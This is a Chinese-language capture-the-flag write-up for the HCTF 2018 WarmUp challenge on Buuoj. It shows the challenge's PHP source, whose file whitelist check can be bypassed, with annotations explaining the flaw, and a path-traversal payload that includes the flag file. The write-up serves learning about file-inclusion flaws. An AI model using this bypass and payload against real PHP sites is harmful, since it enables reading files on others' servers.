Buuoj [HCTF 2018]WarmUp

源码看到source.php 和hint.php

hint:

flag not here, and flag in ffffllllaaaagggg

source.php:

<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page) //check函数
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单只有source.php hint.php
if (! isset($page) || !is_string($page)) { //$page不存在或者不是string,则false
echo "you can't see it";
return false;
}

if (in_array($page, $whitelist)) { //page只有在白名单里面,返回ture,不修改page肯定过不了白名单
return true;
}

$_page = mb_substr( //未解码page 从 0位置开始 mb_strpos长度的字符串 
$page,
0,
mb_strpos($page . '?', '?')//url地址中 第一次出现的位置
);
if (in_array($_page, $whitelist)) {    //截断后的page 必须是source.php和hint.php
return true;
}

$_page = urldecode($page); //地址解码
$_page = mb_substr(  //返回地址解码page从 0位置开始 mb_strpos长度的字符串
$_page,
0,
mb_strpos($_page . '?', '?') //url地址中 ?第一次出现的位置
);
if (in_array($_page, $whitelist)) {  //截断后的page 必须是source.php和hint.php
  //所以这里,对?不编码 编码都可以过
return true;
}
echo "you can't see it";
return false;
}
}

if (!empty($_REQUEST['file']) // $_REQUEST 用于收集HTML表单提交的数据。file不为空 且 是string 且通过check
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}  
?>

payload:

/?file=source.php?../../../../../ffffllllaaaagggg
上一篇:[ThinkPHP]2-Rce buuoj


下一篇:buuoj warmup_csaw_2016